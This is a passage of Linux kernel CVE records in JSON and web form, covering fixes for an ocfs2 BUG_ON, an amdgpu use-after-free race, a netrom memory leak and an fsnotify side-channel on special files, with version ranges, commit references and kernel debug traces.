{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:52.405Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1f77e5cd563e6387fdf3bb714fcda36cd88ac5e7"
},
{
"url": "https://git.kernel.org/stable/c/d0fd1f732ea8063cecd07a3879b7d815c7ee71ed"
},
{
"url": "https://git.kernel.org/stable/c/b08a33d5f80efe6979a6e8f905c1a898910c21dd"
},
{
"url": "https://git.kernel.org/stable/c/96f1b074c98c20f55a3b23d2ab44d9fb0f619869"
},
{
"url": "https://git.kernel.org/stable/c/e24aedae71652d4119049f1fbef6532ccbe3966d"
},
{
"url": "https://git.kernel.org/stable/c/7acc0390e0dd7474c4451d05465a677d55ad4268"
},
{
"url": "https://git.kernel.org/stable/c/039bef30e320827bac8990c9f29d2a68cd8adb5f"
}
],
"title": "ocfs2: fix kernel BUG in ocfs2_find_victim_chain",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68771",
"datePublished": "2026-01-13T15:28:49.272Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:52.405Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68793 (GCVE-0-2025-68793)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
drm/amdgpu: fix a job->pasid access race in gpu recovery
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: fix a job->pasid access race in gpu recovery
Avoid a possible UAF in GPU recovery due to a race between
the sched timeout callback and the tdr work queue.
The gpu recovery function calls drm_sched_stop() and
later drm_sched_start(). drm_sched_start() restarts
the tdr queue which will eventually free the job. If
the tdr queue frees the job before time out callback
completes, the job will be freed and we'll get a UAF
when accessing the pasid. Cache it early to avoid the
UAF.
Example KASAN trace:
[ 493.058141] BUG: KASAN: slab-use-after-free in amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.067530] Read of size 4 at addr ffff88b0ce3f794c by task kworker/u128:1/323
[ 493.074892]
[ 493.076485] CPU: 9 UID: 0 PID: 323 Comm: kworker/u128:1 Tainted: G E 6.16.0-1289896.2.zuul.bf4f11df81c1410bbe901c4373305a31 #1 PREEMPT(voluntary)
[ 493.076493] Tainted: [E]=UNSIGNED_MODULE
[ 493.076495] Hardware name: TYAN B8021G88V2HR-2T/S8021GM2NR-2T, BIOS V1.03.B10 04/01/2019
[ 493.076500] Workqueue: amdgpu-reset-dev drm_sched_job_timedout [gpu_sched]
[ 493.076512] Call Trace:
[ 493.076515] <TASK>
[ 493.076518] dump_stack_lvl+0x64/0x80
[ 493.076529] print_report+0xce/0x630
[ 493.076536] ? _raw_spin_lock_irqsave+0x86/0xd0
[ 493.076541] ? __pfx__raw_spin_lock_irqsave+0x10/0x10
[ 493.076545] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.077253] kasan_report+0xb8/0xf0
[ 493.077258] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.077965] amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.078672] ? __pfx_amdgpu_device_gpu_recover+0x10/0x10 [amdgpu]
[ 493.079378] ? amdgpu_coredump+0x1fd/0x4c0 [amdgpu]
[ 493.080111] amdgpu_job_timedout+0x642/0x1400 [amdgpu]
[ 493.080903] ? pick_task_fair+0x24e/0x330
[ 493.080910] ? __pfx_amdgpu_job_timedout+0x10/0x10 [amdgpu]
[ 493.081702] ? _raw_spin_lock+0x75/0xc0
[ 493.081708] ? __pfx__raw_spin_lock+0x10/0x10
[ 493.081712] drm_sched_job_timedout+0x1b0/0x4b0 [gpu_sched]
[ 493.081721] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 493.081725] process_one_work+0x679/0xff0
[ 493.081732] worker_thread+0x6ce/0xfd0
[ 493.081736] ? __pfx_worker_thread+0x10/0x10
[ 493.081739] kthread+0x376/0x730
[ 493.081744] ? __pfx_kthread+0x10/0x10
[ 493.081748] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 493.081751] ? __pfx_kthread+0x10/0x10
[ 493.081755] ret_from_fork+0x247/0x330
[ 493.081761] ? __pfx_kthread+0x10/0x10
[ 493.081764] ret_from_fork_asm+0x1a/0x30
[ 493.081771] </TASK>
(cherry picked from commit 20880a3fd5dd7bca1a079534cf6596bda92e107d)
Severity
No CVSS data available.
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dac58c012c47cadf337a35eb05d44498c43e5cd0",
"status": "affected",
"version": "a72002cb181f350734108228b24c5d10d358f95a",
"versionType": "git"
},
{
"lessThan": "77f73253015cbc7893fca1821ac3eae9eb4bc943",
"status": "affected",
"version": "a72002cb181f350734108228b24c5d10d358f95a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.17"
},
{
"lessThan": "6.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix a job-\u003epasid access race in gpu recovery\n\nAvoid a possible UAF in GPU recovery due to a race between\nthe sched timeout callback and the tdr work queue.\n\nThe gpu recovery function calls drm_sched_stop() and\nlater drm_sched_start(). drm_sched_start() restarts\nthe tdr queue which will eventually free the job. If\nthe tdr queue frees the job before time out callback\ncompletes, the job will be freed and we\u0027ll get a UAF\nwhen accessing the pasid. Cache it early to avoid the\nUAF.\n\nExample KASAN trace:\n[ 493.058141] BUG: KASAN: slab-use-after-free in amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]\n[ 493.067530] Read of size 4 at addr ffff88b0ce3f794c by task kworker/u128:1/323\n[ 493.074892]\n[ 493.076485] CPU: 9 UID: 0 PID: 323 Comm: kworker/u128:1 Tainted: G E 6.16.0-1289896.2.zuul.bf4f11df81c1410bbe901c4373305a31 #1 PREEMPT(voluntary)\n[ 493.076493] Tainted: [E]=UNSIGNED_MODULE\n[ 493.076495] Hardware name: TYAN B8021G88V2HR-2T/S8021GM2NR-2T, BIOS V1.03.B10 04/01/2019\n[ 493.076500] Workqueue: amdgpu-reset-dev drm_sched_job_timedout [gpu_sched]\n[ 493.076512] Call Trace:\n[ 493.076515] \u003cTASK\u003e\n[ 493.076518] dump_stack_lvl+0x64/0x80\n[ 493.076529] print_report+0xce/0x630\n[ 493.076536] ? _raw_spin_lock_irqsave+0x86/0xd0\n[ 493.076541] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 493.076545] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]\n[ 493.077253] kasan_report+0xb8/0xf0\n[ 493.077258] ? amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]\n[ 493.077965] amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]\n[ 493.078672] ? __pfx_amdgpu_device_gpu_recover+0x10/0x10 [amdgpu]\n[ 493.079378] ? amdgpu_coredump+0x1fd/0x4c0 [amdgpu]\n[ 493.080111] amdgpu_job_timedout+0x642/0x1400 [amdgpu]\n[ 493.080903] ? pick_task_fair+0x24e/0x330\n[ 493.080910] ? __pfx_amdgpu_job_timedout+0x10/0x10 [amdgpu]\n[ 493.081702] ? _raw_spin_lock+0x75/0xc0\n[ 493.081708] ? __pfx__raw_spin_lock+0x10/0x10\n[ 493.081712] drm_sched_job_timedout+0x1b0/0x4b0 [gpu_sched]\n[ 493.081721] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 493.081725] process_one_work+0x679/0xff0\n[ 493.081732] worker_thread+0x6ce/0xfd0\n[ 493.081736] ? __pfx_worker_thread+0x10/0x10\n[ 493.081739] kthread+0x376/0x730\n[ 493.081744] ? __pfx_kthread+0x10/0x10\n[ 493.081748] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 493.081751] ? __pfx_kthread+0x10/0x10\n[ 493.081755] ret_from_fork+0x247/0x330\n[ 493.081761] ? __pfx_kthread+0x10/0x10\n[ 493.081764] ret_from_fork_asm+0x1a/0x30\n[ 493.081771] \u003c/TASK\u003e\n\n(cherry picked from commit 20880a3fd5dd7bca1a079534cf6596bda92e107d)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:04.877Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dac58c012c47cadf337a35eb05d44498c43e5cd0"
},
{
"url": "https://git.kernel.org/stable/c/77f73253015cbc7893fca1821ac3eae9eb4bc943"
}
],
"title": "drm/amdgpu: fix a job-\u003epasid access race in gpu recovery",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68793",
"datePublished": "2026-01-13T15:29:04.877Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-13T15:29:04.877Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68787 (GCVE-0-2025-68787)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
netrom: Fix memory leak in nr_sendmsg()
Summary
In the Linux kernel, the following vulnerability has been resolved:
netrom: Fix memory leak in nr_sendmsg()
syzbot reported a memory leak [1].
When function sock_alloc_send_skb() returns NULL in nr_output(), the
original skb is not freed, which was allocated in nr_sendmsg(). Fix this
by freeing it before return.
[1]
BUG: memory leak
unreferenced object 0xffff888129f35500 (size 240):
comm "syz.0.17", pid 6119, jiffies 4294944652
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 10 52 28 81 88 ff ff ..........R(....
backtrace (crc 1456a3e4):
kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline]
slab_post_alloc_hook mm/slub.c:4983 [inline]
slab_alloc_node mm/slub.c:5288 [inline]
kmem_cache_alloc_node_noprof+0x36f/0x5e0 mm/slub.c:5340
__alloc_skb+0x203/0x240 net/core/skbuff.c:660
alloc_skb include/linux/skbuff.h:1383 [inline]
alloc_skb_with_frags+0x69/0x3f0 net/core/skbuff.c:6671
sock_alloc_send_pskb+0x379/0x3e0 net/core/sock.c:2965
sock_alloc_send_skb include/net/sock.h:1859 [inline]
nr_sendmsg+0x287/0x450 net/netrom/af_netrom.c:1105
sock_sendmsg_nosec net/socket.c:727 [inline]
__sock_sendmsg net/socket.c:742 [inline]
sock_write_iter+0x293/0x2a0 net/socket.c:1195
new_sync_write fs/read_write.c:593 [inline]
vfs_write+0x45d/0x710 fs/read_write.c:686
ksys_write+0x143/0x170 fs/read_write.c:738
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xa4/0xfa0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f77e538ac4e3adb1882d5bccb7bfdc111b5963d3 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 09efbf54eeaecebe882af603c9939a4b1bb9567e (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 73839497bbde5cd4fd02bbd9c8bc2640780ae65d (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 156a0f6341dce634a825db49ca20b48b1ae9bcc1 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 8d1ccba4b171cd504ecfa47349cb9864fc9d687c (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 51f5fbc1681bdcffcc7d18bf3dfdb2b1278d3977 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 613d12dd794e078be8ff3cf6b62a6b9acf7f4619 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netrom/nr_out.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f77e538ac4e3adb1882d5bccb7bfdc111b5963d3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "09efbf54eeaecebe882af603c9939a4b1bb9567e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "73839497bbde5cd4fd02bbd9c8bc2640780ae65d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "156a0f6341dce634a825db49ca20b48b1ae9bcc1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8d1ccba4b171cd504ecfa47349cb9864fc9d687c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "51f5fbc1681bdcffcc7d18bf3dfdb2b1278d3977",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "613d12dd794e078be8ff3cf6b62a6b9acf7f4619",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netrom/nr_out.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetrom: Fix memory leak in nr_sendmsg()\n\nsyzbot reported a memory leak [1].\n\nWhen function sock_alloc_send_skb() return NULL in nr_output(), the\noriginal skb is not freed, which was allocated in nr_sendmsg(). Fix this\nby freeing it before return.\n\n[1]\nBUG: memory leak\nunreferenced object 0xffff888129f35500 (size 240):\n comm \"syz.0.17\", pid 6119, jiffies 4294944652\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 10 52 28 81 88 ff ff ..........R(....\n backtrace (crc 1456a3e4):\n kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline]\n slab_post_alloc_hook mm/slub.c:4983 [inline]\n slab_alloc_node mm/slub.c:5288 [inline]\n kmem_cache_alloc_node_noprof+0x36f/0x5e0 mm/slub.c:5340\n __alloc_skb+0x203/0x240 net/core/skbuff.c:660\n alloc_skb include/linux/skbuff.h:1383 [inline]\n alloc_skb_with_frags+0x69/0x3f0 net/core/skbuff.c:6671\n sock_alloc_send_pskb+0x379/0x3e0 net/core/sock.c:2965\n sock_alloc_send_skb include/net/sock.h:1859 [inline]\n nr_sendmsg+0x287/0x450 net/netrom/af_netrom.c:1105\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n sock_write_iter+0x293/0x2a0 net/socket.c:1195\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x45d/0x710 fs/read_write.c:686\n ksys_write+0x143/0x170 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xa4/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:03.559Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f77e538ac4e3adb1882d5bccb7bfdc111b5963d3"
},
{
"url": "https://git.kernel.org/stable/c/09efbf54eeaecebe882af603c9939a4b1bb9567e"
},
{
"url": "https://git.kernel.org/stable/c/73839497bbde5cd4fd02bbd9c8bc2640780ae65d"
},
{
"url": "https://git.kernel.org/stable/c/156a0f6341dce634a825db49ca20b48b1ae9bcc1"
},
{
"url": "https://git.kernel.org/stable/c/8d1ccba4b171cd504ecfa47349cb9864fc9d687c"
},
{
"url": "https://git.kernel.org/stable/c/51f5fbc1681bdcffcc7d18bf3dfdb2b1278d3977"
},
{
"url": "https://git.kernel.org/stable/c/613d12dd794e078be8ff3cf6b62a6b9acf7f4619"
}
],
"title": "netrom: Fix memory leak in nr_sendmsg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68787",
"datePublished": "2026-01-13T15:29:00.344Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:19:03.559Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68788 (GCVE-0-2025-68788)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
fsnotify: do not generate ACCESS/MODIFY events on child for special files
Summary
In the Linux kernel, the following vulnerability has been resolved:
fsnotify: do not generate ACCESS/MODIFY events on child for special files
inotify/fanotify do not allow users with no read access to a file to
subscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the
same user to subscribe for watching events on children when the user
has access to the parent directory (e.g. /dev).
Users with no read access to a file but with read access to its parent
directory can still stat the file and see if it was accessed/modified
via atime/mtime change.
The same is not true for special files (e.g. /dev/null). Users will not
generally observe atime/mtime changes when other users read/write to
special files, only when someone sets atime/mtime via utimensat().
Align fsnotify events with this stat behavior and do not generate
ACCESS/MODIFY events to parent watchers on read/write of special files.
The events are still generated to parent watchers on utimensat(). This
closes some side-channels that could be possibly used for information
exfiltration [1].
[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < df2711544b050aba703e6da418c53c7dc5d443ca (git) |
| Linux | Linux | Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 859bdf438f01d9aa7f84b09c1202d548c7cad9e8 (git) |
| Linux | Linux | Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 6a7d7d96eeeab7af2bd01afbb3d9878a11a13d91 (git) |
| Linux | Linux | Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < e0643d46759db8b84c0504a676043e5e341b6c81 (git) |
| Linux | Linux | Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 82f7416bcbd951549e758d15fc1a96a5afc2e900 (git) |
| Linux | Linux | Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 7a93edb23bcf07a3aaf8b598edfc2faa8fbcc0b6 (git) |
| Linux | Linux | Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 635bc4def026a24e071436f4f356ea08c0eed6ff (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/notify/fsnotify.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "df2711544b050aba703e6da418c53c7dc5d443ca",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "859bdf438f01d9aa7f84b09c1202d548c7cad9e8",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "6a7d7d96eeeab7af2bd01afbb3d9878a11a13d91",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "e0643d46759db8b84c0504a676043e5e341b6c81",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "82f7416bcbd951549e758d15fc1a96a5afc2e900",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "7a93edb23bcf07a3aaf8b598edfc2faa8fbcc0b6",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "635bc4def026a24e071436f4f356ea08c0eed6ff",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/notify/fsnotify.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.36"
},
{
"lessThan": "2.6.36",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
